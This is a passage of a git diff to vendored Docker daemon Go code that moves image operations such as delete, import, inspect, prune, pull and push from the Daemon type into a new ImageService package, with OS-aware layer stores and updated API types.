(!daemon.imageIsDangling(imgID) || conflict.used) { + if conflict := i.checkImageDeleteConflict(imgID, c); conflict != nil { + if quiet && (!i.imageIsDangling(imgID) || conflict.used) { // Ignore conflicts UNLESS the image is "dangling" or not being used in // which case we want the user to know. return nil @@ -314,26 +316,26 @@ func (daemon *Daemon) imageDeleteHelper(imgID image.ID, records *[]types.ImageDe return conflict } - parent, err := daemon.imageStore.GetParent(imgID) + parent, err := i.imageStore.GetParent(imgID) if err != nil { // There may be no parent parent = "" } // Delete all repository tag/digest references to this image. - if err := daemon.removeAllReferencesToImageID(imgID, records); err != nil { + if err := i.removeAllReferencesToImageID(imgID, records); err != nil { return err } - removedLayers, err := daemon.imageStore.Delete(imgID) + removedLayers, err := i.imageStore.Delete(imgID) if err != nil { return err } - daemon.LogImageEvent(imgID.String(), imgID.String(), "delete") - *records = append(*records, types.ImageDelete{Deleted: imgID.String()}) + i.LogImageEvent(imgID.String(), imgID.String(), "delete") + *records = append(*records, types.ImageDeleteResponseItem{Deleted: imgID.String()}) for _, removedLayer := range removedLayers { - *records = append(*records, types.ImageDelete{Deleted: removedLayer.ChainID.String()}) + *records = append(*records, types.ImageDeleteResponseItem{Deleted: removedLayer.ChainID.String()}) } if !prune || parent == "" { @@ -345,7 +347,7 @@ func (daemon *Daemon) imageDeleteHelper(imgID image.ID, records *[]types.ImageDe // either running or stopped). // Do not force prunings, but do so quietly (stopping on any encountered // conflicts). - return daemon.imageDeleteHelper(parent, records, false, true, true) + return i.imageDeleteHelper(parent, records, false, true, true) } // checkImageDeleteConflict determines whether there are any conflicts @@ -354,9 +356,9 @@ func (daemon *Daemon) imageDeleteHelper(imgID image.ID, records *[]types.ImageDe // using the image. A soft conflict is any tags/digest referencing the given // image or any stopped container using the image. If ignoreSoftConflicts is // true, this function will not check for soft conflict conditions. -func (daemon *Daemon) checkImageDeleteConflict(imgID image.ID, mask conflictType) *imageDeleteConflict { +func (i *ImageService) checkImageDeleteConflict(imgID image.ID, mask conflictType) *imageDeleteConflict { // Check if the image has any descendant images. - if mask&conflictDependentChild != 0 && len(daemon.imageStore.Children(imgID)) > 0 { + if mask&conflictDependentChild != 0 && len(i.imageStore.Children(imgID)) > 0 { return &imageDeleteConflict{ hard: true, imgID: imgID, @@ -369,7 +371,7 @@ func (daemon *Daemon) checkImageDeleteConflict(imgID image.ID, mask conflictType running := func(c *container.Container) bool { return c.IsRunning() && c.ImageID == imgID } - if container := daemon.containers.First(running); container != nil { + if container := i.containers.First(running); container != nil { return &imageDeleteConflict{ imgID: imgID, hard: true, @@ -380,7 +382,7 @@ func (daemon *Daemon) checkImageDeleteConflict(imgID image.ID, mask conflictType } // Check if any repository tags/digest reference this image. - if mask&conflictActiveReference != 0 && len(daemon.referenceStore.References(imgID.Digest())) > 0 { + if mask&conflictActiveReference != 0 && len(i.referenceStore.References(imgID.Digest())) > 0 { return &imageDeleteConflict{ imgID: imgID, message: "image is referenced in multiple repositories", @@ -392,7 +394,7 @@ func (daemon *Daemon) checkImageDeleteConflict(imgID image.ID, mask conflictType stopped := func(c *container.Container) bool { return !c.IsRunning() && c.ImageID == imgID } - if container := daemon.containers.First(stopped); container != nil { + if container := i.containers.First(stopped); container != nil { return &imageDeleteConflict{ imgID: imgID, used: true, @@ -407,6 +409,6 @@ func (daemon *Daemon) checkImageDeleteConflict(imgID image.ID, mask conflictType // imageIsDangling returns whether the given image is "dangling" which means // that there are no repository references to the given image and it has no // child images. -func (daemon *Daemon) imageIsDangling(imgID image.ID) bool { - return !(len(daemon.referenceStore.References(imgID.Digest())) > 0 || len(daemon.imageStore.Children(imgID)) > 0) +func (i *ImageService) imageIsDangling(imgID image.ID) bool { + return !(len(i.referenceStore.References(imgID.Digest())) > 0 || len(i.imageStore.Children(imgID)) > 0) } diff --git a/vendor/github.com/docker/docker/daemon/images/image_events.go b/vendor/github.com/docker/docker/daemon/images/image_events.go new file mode 100644 index 0000000000..d0b3064d70 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/image_events.go @@ -0,0 +1,39 @@ +package images // import "github.com/docker/docker/daemon/images" + +import ( + "github.com/docker/docker/api/types/events" +) + +// LogImageEvent generates an event related to an image with only the default attributes. +func (i *ImageService) LogImageEvent(imageID, refName, action string) { + i.LogImageEventWithAttributes(imageID, refName, action, map[string]string{}) +} + +// LogImageEventWithAttributes generates an event related to an image with specific given attributes. +func (i *ImageService) LogImageEventWithAttributes(imageID, refName, action string, attributes map[string]string) { + img, err := i.GetImage(imageID) + if err == nil && img.Config != nil { + // image has not been removed yet. + // it could be missing if the event is `delete`. + copyAttributes(attributes, img.Config.Labels) + } + if refName != "" { + attributes["name"] = refName + } + actor := events.Actor{ + ID: imageID, + Attributes: attributes, + } + + i.eventsService.Log(action, events.ImageEventType, actor) +} + +// copyAttributes guarantees that labels are not mutated by event triggers. +func copyAttributes(attributes, labels map[string]string) { + if labels == nil { + return + } + for k, v := range labels { + attributes[k] = v + } +} diff --git a/vendor/github.com/docker/docker/daemon/image_exporter.go b/vendor/github.com/docker/docker/daemon/images/image_exporter.go similarity index 61% rename from vendor/github.com/docker/docker/daemon/image_exporter.go rename to vendor/github.com/docker/docker/daemon/images/image_exporter.go index 95d1d3dcdb..58105dcb71 100644 --- a/vendor/github.com/docker/docker/daemon/image_exporter.go +++ b/vendor/github.com/docker/docker/daemon/images/image_exporter.go @@ -1,4 +1,4 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( "io" @@ -11,15 +11,15 @@ import ( // stream. All images with the given tag and all versions containing // the same tag are exported. names is the set of tags to export, and // outStream is the writer which the images are written to. -func (daemon *Daemon) ExportImage(names []string, outStream io.Writer) error { - imageExporter := tarexport.NewTarExporter(daemon.imageStore, daemon.layerStore, daemon.referenceStore, daemon) +func (i *ImageService) ExportImage(names []string, outStream io.Writer) error { + imageExporter := tarexport.NewTarExporter(i.imageStore, i.layerStores, i.referenceStore, i) return imageExporter.Save(names, outStream) } // LoadImage uploads a set of images into the repository. This is the // complement of ImageExport. The input stream is an uncompressed tar // ball containing images and metadata. -func (daemon *Daemon) LoadImage(inTar io.ReadCloser, outStream io.Writer, quiet bool) error { - imageExporter := tarexport.NewTarExporter(daemon.imageStore, daemon.layerStore, daemon.referenceStore, daemon) +func (i *ImageService) LoadImage(inTar io.ReadCloser, outStream io.Writer, quiet bool) error { + imageExporter := tarexport.NewTarExporter(i.imageStore, i.layerStores, i.referenceStore, i) return imageExporter.Load(inTar, outStream, quiet) } diff --git a/vendor/github.com/docker/docker/daemon/image_history.go b/vendor/github.com/docker/docker/daemon/images/image_history.go similarity index 60% rename from vendor/github.com/docker/docker/daemon/image_history.go rename to vendor/github.com/docker/docker/daemon/images/image_history.go index 839dd1283b..b4ca25b1b6 100644 --- a/vendor/github.com/docker/docker/daemon/image_history.go +++ b/vendor/github.com/docker/docker/daemon/images/image_history.go @@ -1,24 +1,25 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( "fmt" "time" - "github.com/docker/docker/api/types" + "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types/image" "github.com/docker/docker/layer" - "github.com/docker/docker/reference" + "github.com/docker/docker/pkg/system" ) // ImageHistory returns a slice of ImageHistory structures for the specified image // name by walking the image lineage. -func (daemon *Daemon) ImageHistory(name string) ([]*types.ImageHistory, error) { +func (i *ImageService) ImageHistory(name string) ([]*image.HistoryResponseItem, error) { start := time.Now() - img, err := daemon.GetImage(name) + img, err := i.GetImage(name) if err != nil { return nil, err } - history := []*types.ImageHistory{} + history := []*image.HistoryResponseItem{} layerCounter := 0 rootFS := *img.RootFS @@ -31,14 +32,16 @@ func (daemon *Daemon) ImageHistory(name string) ([]*types.ImageHistory, error) { if len(img.RootFS.DiffIDs) <= layerCounter { return nil, fmt.Errorf("too many non-empty layers in History section") } - + if !system.IsOSSupported(img.OperatingSystem()) { + return nil, system.ErrNotSupportedOperatingSystem + } rootFS.Append(img.RootFS.DiffIDs[layerCounter]) - l, err := daemon.layerStore.Get(rootFS.ChainID()) + l, err := i.layerStores[img.OperatingSystem()].Get(rootFS.ChainID()) if err != nil { return nil, err } layerSize, err = l.DiffSize() - layer.ReleaseAndLog(daemon.layerStore, l) + layer.ReleaseAndLog(i.layerStores[img.OperatingSystem()], l) if err != nil { return nil, err } @@ -46,7 +49,7 @@ func (daemon *Daemon) ImageHistory(name string) ([]*types.ImageHistory, error) { layerCounter++ } - history = append([]*types.ImageHistory{{ + history = append([]*image.HistoryResponseItem{{ ID: "", Created: h.Created.Unix(), CreatedBy: h.CreatedBy, @@ -62,9 +65,9 @@ func (daemon *Daemon) ImageHistory(name string) ([]*types.ImageHistory, error) { h.ID = id.String() var tags []string - for _, r := range daemon.referenceStore.References(id.Digest()) { + for _, r := range i.referenceStore.References(id.Digest()) { if _, ok := r.(reference.NamedTagged); ok { - tags = append(tags, r.String()) + tags = append(tags, reference.FamiliarString(r)) } } @@ -74,7 +77,7 @@ func (daemon *Daemon) ImageHistory(name string) ([]*types.ImageHistory, error) { if id == "" { break } - histImg, err = daemon.GetImage(id.String()) + histImg, err = i.GetImage(id.String()) if err != nil { break } diff --git a/vendor/github.com/docker/docker/daemon/import.go b/vendor/github.com/docker/docker/daemon/images/image_import.go similarity index 60% rename from vendor/github.com/docker/docker/daemon/import.go rename to vendor/github.com/docker/docker/daemon/images/image_import.go index c93322b92e..8d54e0704f 100644 --- a/vendor/github.com/docker/docker/daemon/import.go +++ b/vendor/github.com/docker/docker/daemon/images/image_import.go @@ -1,58 +1,63 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( "encoding/json" - "errors" "io" "net/http" "net/url" "runtime" + "strings" "time" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types/container" "github.com/docker/docker/builder/dockerfile" + "github.com/docker/docker/builder/remotecontext" "github.com/docker/docker/dockerversion" + "github.com/docker/docker/errdefs" "github.com/docker/docker/image" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/httputils" "github.com/docker/docker/pkg/progress" "github.com/docker/docker/pkg/streamformatter" - "github.com/docker/docker/reference" + "github.com/pkg/errors" ) // ImportImage imports an image, getting the archived layer data either from // inConfig (if src is "-"), or from a URI specified in src. Progress output is // written to outStream. Repository and tag names can optionally be given in // the repo and tag arguments, respectively. -func (daemon *Daemon) ImportImage(src string, repository, tag string, msg string, inConfig io.ReadCloser, outStream io.Writer, changes []string) error { +func (i *ImageService) ImportImage(src string, repository, os string, tag string, msg string, inConfig io.ReadCloser, outStream io.Writer, changes []string) error { var ( - sf = streamformatter.NewJSONStreamFormatter() rc io.ReadCloser resp *http.Response newRef reference.Named ) + // Default the operating system if not supplied. + if os == "" { + os = runtime.GOOS + } + if repository != "" { var err error - newRef, err = reference.ParseNamed(repository) + newRef, err = reference.ParseNormalizedNamed(repository) if err != nil { - return err + return errdefs.InvalidParameter(err) } - if _, isCanonical := newRef.(reference.Canonical); isCanonical { - return errors.New("cannot import digest reference") + return errdefs.InvalidParameter(errors.New("cannot import digest reference")) } if tag != "" { newRef, err = reference.WithTag(newRef, tag) if err != nil { - return err + return errdefs.InvalidParameter(err) } } } - config, err := dockerfile.BuildFromConfig(&container.Config{}, changes) + config, err := dockerfile.BuildFromConfig(&container.Config{}, changes, os) if err != nil { return err } @@ -60,21 +65,20 @@ func (daemon *Daemon) ImportImage(src string, repository, tag string, msg string rc = inConfig } else { inConfig.Close() + if len(strings.Split(src, "://")) == 1 { + src = "http://" + src + } u, err := url.Parse(src) if err != nil { - return err + return errdefs.InvalidParameter(err) } - if u.Scheme == "" { - u.Scheme = "http" - u.Host = src - u.Path = "" - } - outStream.Write(sf.FormatStatus("", "Downloading from %s", u)) - resp, err = httputils.Download(u.String()) + + resp, err = remotecontext.GetWithStatusError(u.String()) if err != nil { return err } - progressOutput := sf.NewProgressOutput(outStream, true) + outStream.Write(streamformatter.FormatStatus("", "Downloading from %s", u)) + progressOutput := streamformatter.NewJSONProgressOutput(outStream, true) rc = progress.NewProgressReader(resp.Body, progressOutput, resp.ContentLength, "", "Importing") } @@ -87,12 +91,11 @@ func (daemon *Daemon) ImportImage(src string, repository, tag string, msg string if err != nil { return err } - // TODO: support windows baselayer? - l, err := daemon.layerStore.Register(inflatedLayerData, "") + l, err := i.layerStores[os].Register(inflatedLayerData, "") if err != nil { return err } - defer layer.ReleaseAndLog(daemon.layerStore, l) + defer layer.ReleaseAndLog(i.layerStores[os], l) created := time.Now().UTC() imgConfig, err := json.Marshal(&image.Image{ @@ -100,7 +103,7 @@ func (daemon *Daemon) ImportImage(src string, repository, tag string, msg string DockerVersion: dockerversion.Version, Config: config, Architecture: runtime.GOARCH, - OS: runtime.GOOS, + OS: os, Created: created, Comment: msg, }, @@ -117,19 +120,19 @@ func (daemon *Daemon) ImportImage(src string, repository, tag string, msg string return err } - id, err := daemon.imageStore.Create(imgConfig) + id, err := i.imageStore.Create(imgConfig) if err != nil { return err } // FIXME: connect with commit code and call refstore directly if newRef != nil { - if err := daemon.TagImageWithReference(id, newRef); err != nil { + if err := i.TagImageWithReference(id, newRef); err != nil { return err } } - daemon.LogImageEvent(id.String(), id.String(), "import") - outStream.Write(sf.FormatStatus("", id.String())) + i.LogImageEvent(id.String(), id.String(), "import") + outStream.Write(streamformatter.FormatStatus("", id.String())) return nil } diff --git a/vendor/github.com/docker/docker/daemon/image_inspect.go b/vendor/github.com/docker/docker/daemon/images/image_inspect.go similarity index 53% rename from vendor/github.com/docker/docker/daemon/image_inspect.go rename to vendor/github.com/docker/docker/daemon/images/image_inspect.go index ebf912469c..16c4c9b2dc 100644 --- a/vendor/github.com/docker/docker/daemon/image_inspect.go +++ b/vendor/github.com/docker/docker/daemon/images/image_inspect.go @@ -1,31 +1,35 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( - "fmt" "time" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" + "github.com/docker/docker/image" "github.com/docker/docker/layer" - "github.com/docker/docker/reference" + "github.com/docker/docker/pkg/system" + "github.com/pkg/errors" ) // LookupImage looks up an image by name and returns it as an ImageInspect // structure. -func (daemon *Daemon) LookupImage(name string) (*types.ImageInspect, error) { - img, err := daemon.GetImage(name) +func (i *ImageService) LookupImage(name string) (*types.ImageInspect, error) { + img, err := i.GetImage(name) if err != nil { - return nil, fmt.Errorf("No such image: %s", name) + return nil, errors.Wrapf(err, "no such image: %s", name) } - - refs := daemon.referenceStore.References(img.ID().Digest()) + if !system.IsOSSupported(img.OperatingSystem()) { + return nil, system.ErrNotSupportedOperatingSystem + } + refs := i.referenceStore.References(img.ID().Digest()) repoTags := []string{} repoDigests := []string{} for _, ref := range refs { switch ref.(type) { case reference.NamedTagged: - repoTags = append(repoTags, ref.String()) + repoTags = append(repoTags, reference.FamiliarString(ref)) case reference.Canonical: - repoDigests = append(repoDigests, ref.String()) + repoDigests = append(repoDigests, reference.FamiliarString(ref)) } } @@ -33,11 +37,11 @@ func (daemon *Daemon) LookupImage(name string) (*types.ImageInspect, error) { var layerMetadata map[string]string layerID := img.RootFS.ChainID() if layerID != "" { - l, err := daemon.layerStore.Get(layerID) + l, err := i.layerStores[img.OperatingSystem()].Get(layerID) if err != nil { return nil, err } - defer layer.ReleaseAndLog(daemon.layerStore, l) + defer layer.ReleaseAndLog(i.layerStores[img.OperatingSystem()], l) size, err = l.Size() if err != nil { return nil, err @@ -54,6 +58,11 @@ func (daemon *Daemon) LookupImage(name string) (*types.ImageInspect, error) { comment = img.History[len(img.History)-1].Comment } + lastUpdated, err := i.imageStore.GetLastUpdated(img.ID()) + if err != nil { + return nil, err + } + imageInspect := &types.ImageInspect{ ID: img.ID().String(), RepoTags: repoTags, @@ -67,16 +76,29 @@ func (daemon *Daemon) LookupImage(name string) (*types.ImageInspect, error) { Author: img.Author, Config: img.Config, Architecture: img.Architecture, - Os: img.OS, + Os: img.OperatingSystem(), OsVersion: img.OSVersion, Size: size, VirtualSize: size, // TODO: field unused, deprecate RootFS: rootFSToAPIType(img.RootFS), + Metadata: types.ImageMetadata{ + LastTagTime: lastUpdated, + }, } - imageInspect.GraphDriver.Name = daemon.GraphDriverName() - + imageInspect.GraphDriver.Name = i.layerStores[img.OperatingSystem()].DriverName() imageInspect.GraphDriver.Data = layerMetadata return imageInspect, nil } + +func rootFSToAPIType(rootfs *image.RootFS) types.RootFS { + var layers []string + for _, l := range rootfs.DiffIDs { + layers = append(layers, l.String()) + } + return types.RootFS{ + Type: rootfs.Type, + Layers: layers, + } +} diff --git a/vendor/github.com/docker/docker/daemon/images/image_prune.go b/vendor/github.com/docker/docker/daemon/images/image_prune.go new file mode 100644 index 0000000000..313494f2f4 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/image_prune.go @@ -0,0 +1,211 @@ +package images // import "github.com/docker/docker/daemon/images" + +import ( + "context" + "fmt" + "sync/atomic" + "time" + + "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + timetypes "github.com/docker/docker/api/types/time" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +var imagesAcceptedFilters = map[string]bool{ + "dangling": true, + "label": true, + "label!": true, + "until": true, +} + +// errPruneRunning is returned when a prune request is received while +// one is in progress +var errPruneRunning = errdefs.Conflict(errors.New("a prune operation is already running")) + +// ImagesPrune removes unused images +func (i *ImageService) ImagesPrune(ctx context.Context, pruneFilters filters.Args) (*types.ImagesPruneReport, error) { + if !atomic.CompareAndSwapInt32(&i.pruneRunning, 0, 1) { + return nil, errPruneRunning + } + defer atomic.StoreInt32(&i.pruneRunning, 0) + + // make sure that only accepted filters have been received + err := pruneFilters.Validate(imagesAcceptedFilters) + if err != nil { + return nil, err + } + + rep := &types.ImagesPruneReport{} + + danglingOnly := true + if pruneFilters.Contains("dangling") { + if pruneFilters.ExactMatch("dangling", "false") || pruneFilters.ExactMatch("dangling", "0") { + danglingOnly = false + } else if !pruneFilters.ExactMatch("dangling", "true") && !pruneFilters.ExactMatch("dangling", "1") { + return nil, invalidFilter{"dangling", pruneFilters.Get("dangling")} + } + } + + until, err := getUntilFromPruneFilters(pruneFilters) + if err != nil { + return nil, err + } + + var allImages map[image.ID]*image.Image + if danglingOnly { + allImages = i.imageStore.Heads() + } else { + allImages = i.imageStore.Map() + } + + // Filter intermediary images and get their unique size + allLayers := make(map[layer.ChainID]layer.Layer) + for _, ls := range i.layerStores { + for k, v := range ls.Map() { + allLayers[k] = v + } + } + topImages := map[image.ID]*image.Image{} + for id, img := range allImages { + select { + case <-ctx.Done(): + return nil, ctx.Err() + default: + dgst := digest.Digest(id) + if len(i.referenceStore.References(dgst)) == 0 && len(i.imageStore.Children(id)) != 0 { + continue + } + if !until.IsZero() && img.Created.After(until) { + continue + } + if img.Config != nil && !matchLabels(pruneFilters, img.Config.Labels) { + continue + } + topImages[id] = img + } + } + + canceled := false +deleteImagesLoop: + for id := range topImages { + select { + case <-ctx.Done(): + // we still want to calculate freed size and return the data + canceled = true + break deleteImagesLoop + default: + } + + deletedImages := []types.ImageDeleteResponseItem{} + refs := i.referenceStore.References(id.Digest()) + if len(refs) > 0 { + shouldDelete := !danglingOnly + if !shouldDelete { + hasTag := false + for _, ref := range refs { + if _, ok := ref.(reference.NamedTagged); ok { + hasTag = true + break + } + } + + // Only delete if it's untagged (i.e. repo:) + shouldDelete = !hasTag + } + + if shouldDelete { + for _, ref := range refs { + imgDel, err := i.ImageDelete(ref.String(), false, true) + if imageDeleteFailed(ref.String(), err) { + continue + } + deletedImages = append(deletedImages, imgDel...) + } + } + } else { + hex := id.Digest().Hex() + imgDel, err := i.ImageDelete(hex, false, true) + if imageDeleteFailed(hex, err) { + continue + } + deletedImages = append(deletedImages, imgDel...) + } + + rep.ImagesDeleted = append(rep.ImagesDeleted, deletedImages...) + } + + // Compute how much space was freed + for _, d := range rep.ImagesDeleted { + if d.Deleted != "" { + chid := layer.ChainID(d.Deleted) + if l, ok := allLayers[chid]; ok { + diffSize, err := l.DiffSize() + if err != nil { + logrus.Warnf("failed to get layer %s size: %v", chid, err) + continue + } + rep.SpaceReclaimed += uint64(diffSize) + } + } + } + + if canceled { + logrus.Debugf("ImagesPrune operation cancelled: %#v", *rep) + } + + return rep, nil +} + +func imageDeleteFailed(ref string, err error) bool { + switch { + case err == nil: + return false + case errdefs.IsConflict(err): + return true + default: + logrus.Warnf("failed to prune image %s: %v", ref, err) + return true + } +} + +func matchLabels(pruneFilters filters.Args, labels map[string]string) bool { + if !pruneFilters.MatchKVList("label", labels) { + return false + } + // By default MatchKVList will return true if field (like 'label!') does not exist + // So we have to add additional Contains("label!") check + if pruneFilters.Contains("label!") { + if pruneFilters.MatchKVList("label!", labels) { + return false + } + } + return true +} + +func getUntilFromPruneFilters(pruneFilters filters.Args) (time.Time, error) { + until := time.Time{} + if !pruneFilters.Contains("until") { + return until, nil + } + untilFilters := pruneFilters.Get("until") + if len(untilFilters) > 1 { + return until, fmt.Errorf("more than one until filter specified") + } + ts, err := timetypes.GetTimestamp(untilFilters[0], time.Now()) + if err != nil { + return until, err + } + seconds, nanoseconds, err := timetypes.ParseTimestamps(ts, 0) + if err != nil { + return until, err + } + until = time.Unix(seconds, nanoseconds) + return until, nil +} diff --git a/vendor/github.com/docker/docker/daemon/image_pull.go b/vendor/github.com/docker/docker/daemon/images/image_pull.go similarity index 50% rename from vendor/github.com/docker/docker/daemon/image_pull.go rename to vendor/github.com/docker/docker/daemon/images/image_pull.go index 2157d15974..238c38b6b3 100644 --- a/vendor/github.com/docker/docker/daemon/image_pull.go +++ b/vendor/github.com/docker/docker/daemon/images/image_pull.go @@ -1,81 +1,57 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( + "context" "io" + "runtime" "strings" + "time" dist "github.com/docker/distribution" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" - "github.com/docker/docker/builder" "github.com/docker/docker/distribution" progressutils "github.com/docker/docker/distribution/utils" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/progress" - "github.com/docker/docker/reference" "github.com/docker/docker/registry" - "golang.org/x/net/context" + "github.com/opencontainers/go-digest" ) // PullImage initiates a pull operation. image is the repository name to pull, and // tag may be either empty, or indicate a specific tag to pull. -func (daemon *Daemon) PullImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error { +func (i *ImageService) PullImage(ctx context.Context, image, tag, os string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error { + start := time.Now() // Special case: "pull -a" may send an image name with a // trailing :. This is ugly, but let's not break API // compatibility. image = strings.TrimSuffix(image, ":") - ref, err := reference.ParseNamed(image) + ref, err := reference.ParseNormalizedNamed(image) if err != nil { - return err + return errdefs.InvalidParameter(err) } if tag != "" { // The "tag" could actually be a digest. var dgst digest.Digest - dgst, err = digest.ParseDigest(tag) + dgst, err = digest.Parse(tag) if err == nil { ref, err = reference.WithDigest(reference.TrimNamed(ref), dgst) } else { ref, err = reference.WithTag(ref, tag) } if err != nil { - return err + return errdefs.InvalidParameter(err) } } - return daemon.pullImageWithReference(ctx, ref, metaHeaders, authConfig, outStream) -} - -// PullOnBuild tells Docker to pull image referenced by `name`. -func (daemon *Daemon) PullOnBuild(ctx context.Context, name string, authConfigs map[string]types.AuthConfig, output io.Writer) (builder.Image, error) { - ref, err := reference.ParseNamed(name) - if err != nil { - return nil, err - } - ref = reference.WithDefaultTag(ref) - - pullRegistryAuth := &types.AuthConfig{} - if len(authConfigs) > 0 { - // The request came with a full auth config file, we prefer to use that - repoInfo, err := daemon.RegistryService.ResolveRepository(ref) - if err != nil { - return nil, err - } - - resolvedConfig := registry.ResolveAuthConfig( - authConfigs, - repoInfo.Index, - ) - pullRegistryAuth = &resolvedConfig - } - - if err := daemon.pullImageWithReference(ctx, ref, nil, pullRegistryAuth, output); err != nil { - return nil, err - } - return daemon.GetImage(name) + err = i.pullImageWithReference(ctx, ref, os, metaHeaders, authConfig, outStream) + imageActions.WithValues("pull").UpdateSince(start) + return err } -func (daemon *Daemon) pullImageWithReference(ctx context.Context, ref reference.Named, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error { +func (i *ImageService) pullImageWithReference(ctx context.Context, ref reference.Named, os string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error { // Include a buffer so that slow client connections don't affect // transfer performance. progressChan := make(chan progress.Progress, 100) @@ -89,19 +65,25 @@ func (daemon *Daemon) pullImageWithReference(ctx context.Context, ref reference. close(writesDone) }() + // Default to the host OS platform in case it hasn't been populated with an explicit value. + if os == "" { + os = runtime.GOOS + } + imagePullConfig := &distribution.ImagePullConfig{ Config: distribution.Config{ MetaHeaders: metaHeaders, AuthConfig: authConfig, ProgressOutput: progress.ChanOutput(progressChan), - RegistryService: daemon.RegistryService, - ImageEventLogger: daemon.LogImageEvent, - MetadataStore: daemon.distributionMetadataStore, - ImageStore: distribution.NewImageConfigStoreFromStore(daemon.imageStore), - ReferenceStore: daemon.referenceStore, + RegistryService: i.registryService, + ImageEventLogger: i.LogImageEvent, + MetadataStore: i.distributionMetadataStore, + ImageStore: distribution.NewImageConfigStoreFromStore(i.imageStore), + ReferenceStore: i.referenceStore, }, - DownloadManager: daemon.downloadManager, + DownloadManager: i.downloadManager, Schema2Types: distribution.ImageTypes, + OS: os, } err := distribution.Pull(ctx, ref, imagePullConfig) @@ -111,19 +93,19 @@ func (daemon *Daemon) pullImageWithReference(ctx context.Context, ref reference. } // GetRepository returns a repository from the registry. -func (daemon *Daemon) GetRepository(ctx context.Context, ref reference.NamedTagged, authConfig *types.AuthConfig) (dist.Repository, bool, error) { +func (i *ImageService) GetRepository(ctx context.Context, ref reference.Named, authConfig *types.AuthConfig) (dist.Repository, bool, error) { // get repository info - repoInfo, err := daemon.RegistryService.ResolveRepository(ref) + repoInfo, err := i.registryService.ResolveRepository(ref) if err != nil { return nil, false, err } // makes sure name is not empty or `scratch` - if err := distribution.ValidateRepoName(repoInfo.Name()); err != nil { - return nil, false, err + if err := distribution.ValidateRepoName(repoInfo.Name); err != nil { + return nil, false, errdefs.InvalidParameter(err) } // get endpoints - endpoints, err := daemon.RegistryService.LookupPullEndpoints(repoInfo.Hostname()) + endpoints, err := i.registryService.LookupPullEndpoints(reference.Domain(repoInfo.Name)) if err != nil { return nil, false, err } diff --git a/vendor/github.com/docker/docker/daemon/image_push.go b/vendor/github.com/docker/docker/daemon/images/image_push.go similarity index 60% rename from vendor/github.com/docker/docker/daemon/image_push.go rename to vendor/github.com/docker/docker/daemon/images/image_push.go index e6382c7f27..4c7be8d2e9 100644 --- a/vendor/github.com/docker/docker/daemon/image_push.go +++ b/vendor/github.com/docker/docker/daemon/images/image_push.go @@ -1,20 +1,22 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( + "context" "io" + "time" "github.com/docker/distribution/manifest/schema2" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" "github.com/docker/docker/distribution" progressutils "github.com/docker/docker/distribution/utils" "github.com/docker/docker/pkg/progress" - "github.com/docker/docker/reference" - "golang.org/x/net/context" ) // PushImage initiates a push operation on the repository named localName. -func (daemon *Daemon) PushImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error { - ref, err := reference.ParseNamed(image) +func (i *ImageService) PushImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error { + start := time.Now() + ref, err := reference.ParseNormalizedNamed(image) if err != nil { return err } @@ -44,20 +46,21 @@ func (daemon *Daemon) PushImage(ctx context.Context, image, tag string, metaHead MetaHeaders: metaHeaders, AuthConfig: authConfig, ProgressOutput: progress.ChanOutput(progressChan), - RegistryService: daemon.RegistryService, - ImageEventLogger: daemon.LogImageEvent, - MetadataStore: daemon.distributionMetadataStore, - ImageStore: distribution.NewImageConfigStoreFromStore(daemon.imageStore), - ReferenceStore: daemon.referenceStore, + RegistryService: i.registryService, + ImageEventLogger: i.LogImageEvent, + MetadataStore: i.distributionMetadataStore, + ImageStore: distribution.NewImageConfigStoreFromStore(i.imageStore), + ReferenceStore: i.referenceStore, }, ConfigMediaType: schema2.MediaTypeImageConfig, - LayerStore: distribution.NewLayerProviderFromStore(daemon.layerStore), - TrustKey: daemon.trustKey, - UploadManager: daemon.uploadManager, + LayerStores: distribution.NewLayerProvidersFromStores(i.layerStores), + TrustKey: i.trustKey, + UploadManager: i.uploadManager, } err = distribution.Push(ctx, ref, imagePushConfig) close(progressChan) <-writesDone + imageActions.WithValues("push").UpdateSince(start) return err } diff --git a/vendor/github.com/docker/docker/daemon/search.go b/vendor/github.com/docker/docker/daemon/images/image_search.go similarity index 66% rename from vendor/github.com/docker/docker/daemon/search.go rename to vendor/github.com/docker/docker/daemon/images/image_search.go index 5d2ac5d222..8b65ec709c 100644 --- a/vendor/github.com/docker/docker/daemon/search.go +++ b/vendor/github.com/docker/docker/daemon/images/image_search.go @@ -1,11 +1,9 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( - "fmt" + "context" "strconv" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" registrytypes "github.com/docker/docker/api/types/registry" @@ -20,11 +18,14 @@ var acceptedSearchFilterTags = map[string]bool{ // SearchRegistryForImages queries the registry for images matching // term. authConfig is used to login. -func (daemon *Daemon) SearchRegistryForImages(ctx context.Context, filtersArgs string, term string, limit int, +// +// TODO: this could be implemented in a registry service instead of the image +// service. +func (i 